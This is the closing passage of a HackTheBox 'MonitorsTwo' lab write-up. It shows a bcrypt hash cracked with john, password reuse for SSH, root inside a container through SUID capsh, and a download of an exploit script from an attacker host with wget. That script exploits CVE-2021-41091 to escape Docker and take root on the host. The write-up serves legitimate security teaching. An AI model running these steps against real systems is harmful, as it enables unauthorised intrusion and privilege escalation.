<p>Of note, the user <code class="language-plaintext highlighter-rouge">marcus</code> emerges as a particularly intriguing entry, likely associated with the host machine.</p>

<p>The hash, initiated with <code class="language-plaintext highlighter-rouge">$2y$</code>, indicates its nature as a bcrypt hash.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/monitorstwo]
└─<span class="nv">$ </span>john <span class="nt">--format</span><span class="o">=</span>bcrypt <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X3]<span class="o">)</span>
Cost 1 <span class="o">(</span>iteration count<span class="o">)</span> is 1024 <span class="k">for </span>all loaded hashes
Will run 2 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
funkymonkey      <span class="o">(</span>?<span class="o">)</span>     
1g 0:00:01:36 DONE <span class="o">(</span>2023-08-06 10:07<span class="o">)</span> 0.01035g/s 88.32p/s 88.32c/s 88.32C/s lilpimp..coucou
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed.
</code></pre></div></div>

<p>Employing <code class="language-plaintext highlighter-rouge">john</code>, we successfully decrypt the hash, unveiling the password: <code class="language-plaintext highlighter-rouge">funkymonkey</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/monitorstwo]
└─<span class="nv">$ </span>ssh marcus@10.10.11.211
marcus@10.10.11.211<span class="s1">'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 06 Aug 2023 02:09:20 PM UTC

  System load:                      0.0
  Usage of /:                       63.1% of 6.73GB
  Memory usage:                     16%
  Swap usage:                       0%
  Processes:                        252
  Users logged in:                  1
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.211
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:6983


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have mail.
Last login: Sun Aug  6 14:01:44 2023 from 10.10.16.72
marcus@monitorstwo:~$ id; hostname; date 
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
monitorstwo
Sun 06 Aug 2023 02:09:35 PM UTC
</span></code></pre></div></div>

<p>As it turns out, <code class="language-plaintext highlighter-rouge">marcus</code> has reused this password, enabling us to establish an SSH connection into the system.</p>

<h1 id="privilege-escalation-to-root">PRIVILEGE ESCALATION TO <code class="language-plaintext highlighter-rouge">root</code></h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>marcus@monitorstwo:~<span class="nv">$ </span>docker <span class="nt">--version</span>
Docker version 20.10.5+dfsg1, build 55c4c88
</code></pre></div></div>

<p>A brief search on Google discloses the vulnerability <code class="language-plaintext highlighter-rouge">CVE-2021-41091</code>, affecting this specific <code class="language-plaintext highlighter-rouge">Docker</code> version.</p>

<p><code class="language-plaintext highlighter-rouge">CVE-2021-41091</code> represents a flaw within Docker Engine, allowing unprivileged Linux users to navigate through and execute programs within the data directory (typically situated at <code class="language-plaintext highlighter-rouge">/var/lib/docker</code>) due to inadequately restricted permissions. This vulnerability emerges when containers contain executable programs with extended permissions, such as <code class="language-plaintext highlighter-rouge">setuid</code>. Consequently, unprivileged Linux users can locate and execute these programs, and potentially manipulate files if the <code class="language-plaintext highlighter-rouge">UID</code> of the user on the host matches the file owner or group within the container.</p>

<p>A well-illustrated Proof of Concept (PoC) and a detailed account of the vulnerability are furnished <a href="https://github.com/UncleJ4ck/CVE-2021-41091">here</a>, with credit to <a href="https://github.com/UncleJ4ck">UncleJ4ck</a>.</p>

<p>Before proceeding with exploitation, our initial step entails gaining root privileges on the Docker instance.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span>find / <span class="nt">-type</span> f <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
find / <span class="nt">-type</span> f <span class="nt">-perm</span> <span class="nt">-4000</span> 2&gt;/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
</code></pre></div></div>

<p>We observe that the <code class="language-plaintext highlighter-rouge">capsh</code> executable is configured with the <code class="language-plaintext highlighter-rouge">SUID</code> bit. We can exploit this feature to elevate our privileges to <code class="language-plaintext highlighter-rouge">root</code> within the Docker container.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span>capsh <span class="nt">--uid</span><span class="o">=</span>0 <span class="nt">--gid</span><span class="o">=</span>0 <span class="nt">--</span>
capsh <span class="nt">--uid</span><span class="o">=</span>0 <span class="nt">--gid</span><span class="o">=</span>0 <span class="nt">--</span>
<span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>,33<span class="o">(</span>www-data<span class="o">)</span>

<span class="nb">whoami
</span>root

<span class="nb">hostname
</span>50bca5e748b0
</code></pre></div></div>

<p>The subsequent objective is to set the <code class="language-plaintext highlighter-rouge">SUID</code> bit for <code class="language-plaintext highlighter-rouge">/bin/bash</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod </span>u+s /bin/bash
<span class="nb">ls</span> <span class="nt">-al</span> /bin/bash
<span class="nt">-rwsr-xr-x</span> 1 root root 1234376 Mar 27  2022 /bin/bash
</code></pre></div></div>

<p>The final stage involves executing the exploit supplied by <a href="https://github.com/UncleJ4ck">UncleJ4ck</a>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>marcus@monitorstwo:/tmp/curiosity<span class="nv">$ </span>wget <span class="s1">'http://10.10.14.45/exp.sh'</span>
<span class="nt">--2023-08-06</span> 14:33:56--  http://10.10.14.45/exp.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2446 <span class="o">(</span>2.4K<span class="o">)</span> <span class="o">[</span>text/x-sh]
Saving to: ‘exp.sh’

exp.sh                                          100%[<span class="o">====================================================================================================&gt;]</span>   2.39K  <span class="nt">--</span>.-KB/s    <span class="k">in </span>0.002s  

2023-08-06 14:33:56 <span class="o">(</span>1.33 MB/s<span class="o">)</span> - ‘exp.sh’ saved <span class="o">[</span>2446/2446]

marcus@monitorstwo:/tmp/curiosity<span class="nv">$ </span><span class="nb">chmod</span> +x exp.sh 
marcus@monitorstwo:/tmp/curiosity<span class="nv">$ </span>./exp.sh 
<span class="o">[!]</span> Vulnerable to CVE-2021-41091
<span class="o">[!]</span> Now connect to your Docker container that is accessible and obtain root access <span class="o">!</span>
<span class="o">[&gt;]</span> After gaining root access execute this <span class="nb">command</span> <span class="o">(</span><span class="nb">chmod </span>u+s /bin/bash<span class="o">)</span>

Did you correctly <span class="nb">set </span>the setuid bit on /bin/bash <span class="k">in </span>the Docker container? <span class="o">(</span><span class="nb">yes</span>/no<span class="o">)</span>: <span class="nb">yes</span>
<span class="o">[!]</span> Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

<span class="o">[!]</span> Iterating over the available Overlay2 filesystems <span class="o">!</span>
<span class="o">[</span>?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
<span class="o">[</span>x] Could not get root access <span class="k">in</span> <span class="s1">'/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'</span>

<span class="o">[</span>?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
<span class="o">[!]</span> Rooted <span class="o">!</span>
<span class="o">[&gt;]</span> Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
<span class="o">[</span>?] If it didn<span class="s1">'t spawn a shell go to this path and execute '</span>./bin/bash <span class="nt">-p</span><span class="s1">'

[!] Spawning Shell
bash-5.1# exit
marcus@monitorstwo:/tmp/curiosity$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# 
bash-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)
bash-5.1# 
bash-5.1# hostname
monitorstwo
bash-5.1# 
</span></code></pre></div></div>

<p>As a result of these actions, we successfully achieve <code class="language-plaintext highlighter-rouge">root</code> privileges.</p>

<h1 id="conclusion">CONCLUSION</h1>

<p>To sum it up, our journey through <strong>MonitorsTwo</strong> on <strong>HackTheBox</strong> exposed a series of important vulnerabilities. We initially gained access using default credentials for <code class="language-plaintext highlighter-rouge">Cacti</code>, taking advantage of a weakness in version <code class="language-plaintext highlighter-rouge">1.2.22</code> that allowed <strong>remote code execution without authentication</strong> (<code class="language-plaintext highlighter-rouge">CVE-2022-46169</code>).</p>

<p>Within a <code class="language-plaintext highlighter-rouge">Docker</code> container, we extracted key information from the database, including a user hash from the main system. By cracking this hash, we managed to access the host machine via <code class="language-plaintext highlighter-rouge">SSH</code>.</p>

<p>Furthermore, we uncovered a serious flaw in the host’s <code class="language-plaintext highlighter-rouge">Docker</code> version (<code class="language-plaintext highlighter-rouge">20.10.5</code>) known as <code class="language-plaintext highlighter-rouge">CVE-2021-41091</code>. This flaw let us manipulate permissions and perform high-level actions within the <code class="language-plaintext highlighter-rouge">Docker</code> environment, ultimately giving us full control over the host machine.</p>

<p>That is all in this writeup.</p>

<p>Thanks for reading this far. Hope you liked it.</p>



  <small>tags: <em>CVE-2022-46169</em> - <em>cacti exploit</em> - <em>docker breakout</em> - <em>CVE-2021-41091</em> - <em>docker privilege escalation</em></small>


      </section>
    </div>
  </body>
</html>
